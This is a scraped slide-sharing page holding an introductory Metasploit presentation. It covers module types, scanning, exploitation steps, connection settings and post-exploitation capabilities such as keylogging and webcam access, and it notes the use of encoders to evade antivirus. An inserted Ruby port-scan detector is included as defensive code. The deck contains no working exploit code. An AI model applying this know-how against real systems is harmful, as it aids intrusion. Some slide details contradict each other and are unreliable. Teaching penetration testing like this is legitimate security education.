International Workshop on Artificial Intelligence in Software TestingInternational Workshop on Artificial Intelligence in Software Testing
International Workshop on Artificial Intelligence in Software Testing
Sebastiano Panichella
 
Obesity causes and management and associated medical conditions
Obesity causes and management and associated medical conditionsObesity causes and management and associated medical conditions
Obesity causes and management and associated medical conditions
Faculty of Medicine And Health Sciences
 
Doctoral Symposium at the 17th IEEE International Conference on Software Test...
Doctoral Symposium at the 17th IEEE International Conference on Software Test...Doctoral Symposium at the 17th IEEE International Conference on Software Test...
Doctoral Symposium at the 17th IEEE International Conference on Software Test...
Sebastiano Panichella
 

Recently uploaded (13)

Bonzo subscription_hjjjjjjjj5hhhhhhh_2024.pdf
Bonzo subscription_hjjjjjjjj5hhhhhhh_2024.pdfBonzo subscription_hjjjjjjjj5hhhhhhh_2024.pdf
Bonzo subscription_hjjjjjjjj5hhhhhhh_2024.pdf
 
Getting started with Amazon Bedrock Studio and Control Tower
Getting started with Amazon Bedrock Studio and Control TowerGetting started with Amazon Bedrock Studio and Control Tower
Getting started with Amazon Bedrock Studio and Control Tower
 
Announcement of 18th IEEE International Conference on Software Testing, Verif...
Announcement of 18th IEEE International Conference on Software Testing, Verif...Announcement of 18th IEEE International Conference on Software Testing, Verif...
Announcement of 18th IEEE International Conference on Software Testing, Verif...
 
0x01 - Newton's Third Law: Static vs. Dynamic Abusers
0x01 - Newton's Third Law:  Static vs. Dynamic Abusers0x01 - Newton's Third Law:  Static vs. Dynamic Abusers
0x01 - Newton's Third Law: Static vs. Dynamic Abusers
 
Acorn Recovery: Restore IT infra within minutes
Acorn Recovery: Restore IT infra within minutesAcorn Recovery: Restore IT infra within minutes
Acorn Recovery: Restore IT infra within minutes
 
Eureka, I found it! - Special Libraries Association 2021 Presentation
Eureka, I found it! - Special Libraries Association 2021 PresentationEureka, I found it! - Special Libraries Association 2021 Presentation
Eureka, I found it! - Special Libraries Association 2021 Presentation
 
somanykidsbutsofewfathers-140705000023-phpapp02.pptx
somanykidsbutsofewfathers-140705000023-phpapp02.pptxsomanykidsbutsofewfathers-140705000023-phpapp02.pptx
somanykidsbutsofewfathers-140705000023-phpapp02.pptx
 
Bitcoin Lightning wallet and tic-tac-toe game XOXO
Bitcoin Lightning wallet and tic-tac-toe game XOXOBitcoin Lightning wallet and tic-tac-toe game XOXO
Bitcoin Lightning wallet and tic-tac-toe game XOXO
 
Sharpen existing tools or get a new toolbox? Contemporary cluster initiatives...
Sharpen existing tools or get a new toolbox? Contemporary cluster initiatives...Sharpen existing tools or get a new toolbox? Contemporary cluster initiatives...
Sharpen existing tools or get a new toolbox? Contemporary cluster initiatives...
 
Competition and Regulation in Professional Services – KLEINER – June 2024 OEC...
Competition and Regulation in Professional Services – KLEINER – June 2024 OEC...Competition and Regulation in Professional Services – KLEINER – June 2024 OEC...
Competition and Regulation in Professional Services – KLEINER – June 2024 OEC...
 
International Workshop on Artificial Intelligence in Software Testing
International Workshop on Artificial Intelligence in Software TestingInternational Workshop on Artificial Intelligence in Software Testing
International Workshop on Artificial Intelligence in Software Testing
 
Obesity causes and management and associated medical conditions
Obesity causes and management and associated medical conditionsObesity causes and management and associated medical conditions
Obesity causes and management and associated medical conditions
 
Doctoral Symposium at the 17th IEEE International Conference on Software Test...
Doctoral Symposium at the 17th IEEE International Conference on Software Test...Doctoral Symposium at the 17th IEEE International Conference on Software Test...
Doctoral Symposium at the 17th IEEE International Conference on Software Test...
 

Metasploit

  • 2. Useful terminology: • Vulnerability: A weakness in the target system, through which penetration can successfully occur. • Exploit: Once a vulnerability is known, an attacker takes advantage of it, and breaks into the system using a code/script known as an exploit. EXPLOIT = VULNERABILITY + PAYLOAD • Payload: This is a set of tasks initiated by the attacker subsequent to an exploit, in order to maintain access to the compromised system • CLI: command line interface • GUI: graphical user interface • MSF: Meta Sploit Framework
  • 3. WARNINGS Metasploit is very powerful, and very dangerous I used VMWare to isolate the operating system from other systems and the internet Use of this on any unauthorized way will get you fired / arrested / deported etc...
  • 4. HISTORY OF THE METASPLOIT PROJECT • Metasploit Project –HD Moore & Friends –A community-driven project since 2003 • Rapid7 –Maker of NeXpose Vulnerability Management –Purchase the Project from HD • Metasploit Framework –The original open -source exploit framework
  • 5.
  • 6. THIS VIDEO INVOLVES • Usage of METASPLOIT • Social engineering • Organization's server crashes from a DoS attack • Honeypots • Difference between White hat and Black hat hacker • Data breaching
  • 7.
  • 8. METASPLOIT TOPICS Fundamentals about Metasploit Framework Usage Scanning Exploitation Post Exploitation Writing Metasploit Modules
  • 9. WHAT IS METASPLOIT? • Metasploit Framework, created by the Metasploit Project, is the most popular exploitation tool available for developing, testing, and performing exploits. It allows penetration testers, auditors, and vulnerability assessment personnel to create their own penetration testing systems and exploit modules. • It is A collaboration between the open source community and Rapid7 • An exploitation framework written in Ruby, currently at version 4.9.1 • It’s modular • Contains exploits, payloads, encoders and auxiliaries
  • 11. METASPLOIT VERSIONS •1.0 released in 2003 (Perl) •2.0 released in 2004 (Better Perl) –2.7 released in late 2006 •3.0 released in 2007 (Ruby) –3.2 released in late 2008 –3.3 released in late 2009 –3.4 released in early 2010 –3.4.1 is the most recent release •Metasploit now has 567 exploits and 283 auxiliary modules (up from 551 and 261 in v3.4)
  • 12. VERSIONS AND BASICS - Metasploit Framework Edition • The free version - Metasploit Community Edition • A free, web-based user interface for Metasploit - Metasploit Express • An open-core commercial edition for security teams who need to verify vulnerabilities - Metasploit Pro • An open-core commercial Metasploit edition for penetration testers - Armitage • Is a graphical cyber attack management tool for the Metasploit Project that visualizes targets and recommends exploits.
  • 13. • Runs on any operating system -Source code for Linux / Unix / MacOS X -Portable to Windows via CYGWIN • Allows anyone to exploit & usually “root” certain machines with only an IP address and a basic background of the system • Requires no knowledge of the software bug, or exploit machine cod
  • 15. WITH METASPLOIT, YOU CAN PERFORM THE FOLLOWING OPERATIONS Conduct basic penetration tests on small networks Run spot checks on the exploitability of vulnerabilities Discover the network or import data Browse exploit modules and run individual exploits on hosts.
  • 16. HIERARCHY BUILDS UP LIKE THIS
  • 17. • Auxiliary modules – are used for information gathering, enumeration, port scanning and that sort of thing. There are plenty of useful tools in there too for things like connecting to SQL databases and even tools for performing man-in- middle attacks. • Exploit modules – are generally used to deliver exploit code to a target system. • Post modules – offer post exploitation tools such as the ability to extract password hashes and access tokens and even modules for things like taking a screenshot, logging and downloading files. • Payload modules – are used to create malicious payloads for use with an exploit
19. AUXILIARY
• Typically, an exploit without a payload is called an auxiliary module.
• Used for scanning, fuzzing, and some automated tasks.
• Makes use of mixins.
• To run one, type run.
20. ENCODERS
• Encoders are used to evade anti-viruses.
• Payloads are encrypted.
21. NOPS
• Mainly used to keep the size of the payload consistent.
• Having 10 NOPs.
22. SCANNING USING METASPLOIT
• Discovery Through Vulnerability Scanning
  Vulnerability scanning will allow you to quickly scan a target IP range looking for known vulnerabilities, giving a penetration tester a quick idea of what attacks might be worth conducting.
• Port Scanning
  A port scan is a series of messages sent by someone attempting to break into a computer to learn which computer network services, each associated with a “well-known” port number, the computer provides. Port scanning, a favorite approach of computer crackers, gives the assailant an idea of where to probe for weaknesses.
23. HOW A DISCOVERY SCAN WORKS
A discovery scan can be divided into four distinct phases:
• Ping scan - determines if the hosts are online
• Port scan - identifies the ports that are open and the services available on those ports
• OS and version detection - detects the service version numbers and operating system based on how the system responds to the probes
• Data import - collects all the data, creates a report and imports the data into the project
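As an added example (not from the slides), here is the defender's side of the port scan the two slides above describe: a small Ruby detector that reads a firewall log and flags a source that probes many distinct ports on one host within a short window. The log format, the addresses and the thresholds are constructed for this example.

```ruby
require 'time'

# Constructed sample firewall log, one connection attempt per line:
# "<ISO-8601 time> <src IP> <dst IP> <dst port> <ALLOW|DENY>".
# 10.0.0.5 sweeps eight ports on 10.0.0.20 within a few seconds (the
# "series of messages" of a port scan); 10.0.0.7 is ordinary traffic.
SAMPLE_LOG = <<~LOG
  2024-01-01T10:00:00Z 10.0.0.5 10.0.0.20 21 DENY
  2024-01-01T10:00:00Z 10.0.0.5 10.0.0.20 22 ALLOW
  2024-01-01T10:00:01Z 10.0.0.5 10.0.0.20 23 DENY
  2024-01-01T10:00:01Z 10.0.0.5 10.0.0.20 25 DENY
  2024-01-01T10:00:02Z 10.0.0.5 10.0.0.20 80 ALLOW
  2024-01-01T10:00:02Z 10.0.0.5 10.0.0.20 443 ALLOW
  2024-01-01T10:00:03Z 10.0.0.5 10.0.0.20 445 DENY
  2024-01-01T10:00:03Z 10.0.0.5 10.0.0.20 3389 DENY
  2024-01-01T10:00:05Z 10.0.0.7 10.0.0.20 443 ALLOW
  2024-01-01T10:01:10Z 10.0.0.7 10.0.0.20 443 ALLOW
  2024-01-01T10:02:30Z 10.0.0.7 10.0.0.21 22 ALLOW
LOG

LINE_RE = /\A(\S+)\s+(\S+)\s+(\S+)\s+(\d+)\s+(ALLOW|DENY)\z/

# Parses the log into event hashes; malformed lines are skipped, not fatal.
def parse_log(text)
  text.each_line.filter_map do |raw|
    m = LINE_RE.match(raw.strip) or next
    { time: Time.iso8601(m[1]), src: m[2], dst: m[3], dport: m[4].to_i, action: m[5] }
  end
end

# Flags each (source, destination) pair that touched at least `threshold`
# distinct destination ports inside any `window`-second span. DENY lines
# count too: a probe of a closed port is still a probe.
def detect_port_scans(events, threshold: 5, window: 60)
  alerts = []
  events.group_by { |e| [e[:src], e[:dst]] }.each do |(src, dst), evs|
    evs = evs.sort_by { |e| e[:time] }
    evs.each_index do |i|
      t0 = evs[i][:time]
      span = evs[i..].take_while { |e| e[:time] - t0 <= window }
      ports = span.map { |e| e[:dport] }.uniq.sort
      next if ports.size < threshold
      alerts << { src: src, dst: dst, first_seen: t0, ports: ports }
      break # one alert per pair is enough
    end
  end
  alerts
end
```

Running `detect_port_scans(parse_log(SAMPLE_LOG))` returns a single alert for 10.0.0.5 against 10.0.0.20 listing the eight probed ports; raising `threshold` to 9 suppresses it, which is the knob to tune against noisy but legitimate clients.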
24. EXPLOITATION
An exploit is the use of software, data, or commands to “exploit” a weakness in a computer system or program to carry out some malicious intent, such as a denial-of-service attack, Trojans, worms or viruses. The weakness in the system can be a bug or simply a design vulnerability. The process is known as exploitation.
The following are the five steps in the exploitation process:
• Scanning the target
• Selecting an exploit
• Selecting a payload
• Encoding the exploit
• Launching the attack
25.
• Scanning the target
  To scan the target, we use port scanning and vulnerability scanning techniques, using different tools such as Nmap, Nessus, etc.
• Selecting the exploit
  This process includes the selection of an exploit.
• Selecting the payload
  Payloads are the commands the attacker runs upon successful completion of their exploit.
• Encoding the exploit
  Encoding in Metasploit is how the exploit and payload are packaged together, and is often done automatically, via the set commands.
• Launching the attack
  Once all the settings have been set, the attacker simply calls an exploit.
26. EXPLOITING VULNERABILITIES
Metasploit offers a couple of different methods you can use to perform exploitation:
• Auto-exploitation
• Manual exploitation
Auto-Exploitation: The auto-exploitation feature cross-references open services, vulnerability references, and fingerprints to find matching exploits. The simple goal of auto-exploitation is to get a session as quickly as possible by leveraging the data that Metasploit has for the target hosts.
Manual Exploitation: Manual exploitation provides a more targeted and methodical approach to exploiting vulnerabilities. This method is particularly useful if there is a specific vulnerability that you want to exploit.
27.
Payload Type: Specifies the type of payload that the exploit will deliver to the target. Choose one of the following payload types:
• Command: A command execution payload that enables you to execute commands on the remote machine.
• Meterpreter: An advanced payload that provides a command line that enables you to deliver commands and inject extensions on the fly.
28.
Connection Type: Specifies how you want your Metasploit instance to connect to the target. Choose one of the following connection types:
• Auto: Automatically uses a bind connection when NAT is detected; otherwise, a reverse connection is used.
• Bind: Uses a bind connection, which is useful when the targets are behind a firewall or a NAT gateway.
• Reverse: Uses a reverse connection, which is useful if your system is unable to initiate connections to the targets.
29.
• LHOST: Defines the address for the local host.
• LPORT: Defines the ports that you want to use for reverse connections.
• RHOST: Defines the target address.
• RPORT: Defines the remote port you want to attack.
• Target Settings: Specifies the target operating system and version.
• Exploit Timeout: Defines the timeout in minutes.
30. POST EXPLOITATION
• Post exploitation is an important process in a penetration test, as it allows the attacker to gather information from the system that he has exploited. A lot of penetration testers are using the Metasploit framework modules for system exploitation. However, Metasploit also provides modules for post-exploitation activities on a variety of systems.
• Migrates to another process which has admin privileges and then completes the task.
31.
• Using this meterpreter we can perform different tasks by getting the privileges of the victim
• Can grab screenshots, do keylogging and much more by loading extensions such as
  - Espia
  - Incognito
  - Pivot
  - Sniffer
  - Priv
  - Stdapi (by default)
32.
• What else can we do in post exploitation? Let’s list some of them:
  - Keylogging
  - Screenshots
  - View live screen
  - Access webcam
  - Take control of keyboard and mouse
  - Delete user
  - Pivot
  - VM detection
  and many more..
33.
• Advantages
  - Open source
  - Frequently updated
• Disadvantages
  - Difficult to learn
  - Can crash your system if not used wisely
  - Requires deep knowledge for exploit development
34. IT IS USEFUL FOR
• Future penetration testers
• Vulnerability assessment personnel
• Security Engineers
• Security Researchers
• Auditors
• Programmers
• Any IT professional who has to test regularly to maintain compliance requirements
• Any IT professional who runs scheduled testing of security infrastructure as a best practice
35. SUMMARY
• Metasploit is very easy to use, and very powerful
• Web interface allows the scans to be run from any system, on any operating system
• Evidence may or may not be left behind on the system
• IDS/IPS will sense these exploits
• Only contains old & well known exploits
36. NOTE
• Never misuse it for personal purposes
• Use it wisely
• Understand the modules before using them
• Test it using virtual machines

Editor's Notes

  1. It was designed and developed by H.D. Moore in 2003. At first it was written in Perl, then it was re-written in Ruby.
  2. Honeypots (a computer system that is set up to act as a decoy to lure cyber attackers, and to detect, deflect or study attempts to gain unauthorized access to information systems)
  3. Runs on any operating system
  4. FILESYSTEM AND LIBRARIES
     Metasploit Filesystem
     The MSF filesystem is laid out in an intuitive manner and is organized by directory.
     • data: editable files used by Metasploit
     • documentation: provides documentation for the framework
     • external: source code and third-party libraries
     • lib: the ‘meat’ of the framework code base
     • modules: the actual MSF modules
     • plugins: plugins that can be loaded at run-time
     • scripts: Meterpreter and other scripts
     • tools: various useful command-line utilities
     Metasploit Libraries
     The MSF libraries help us to run our exploits without having to write additional code for rudimentary tasks, such as HTTP requests or encoding of payloads.
  5. It has 1500+ tested exploits, 400+ payloads and 40+ encoders. It offers “plug and play” of payloads, which alone is a huge advantage.
  6. In object-oriented programming languages, a Mixin is a class that contains methods for use by other classes without having to be the parent class of those other classes.
  7. Requires no knowledge of the software bug or exploit machine code. Allows anyone to exploit and usually “root” certain machines with only an IP address and a basic background of the system.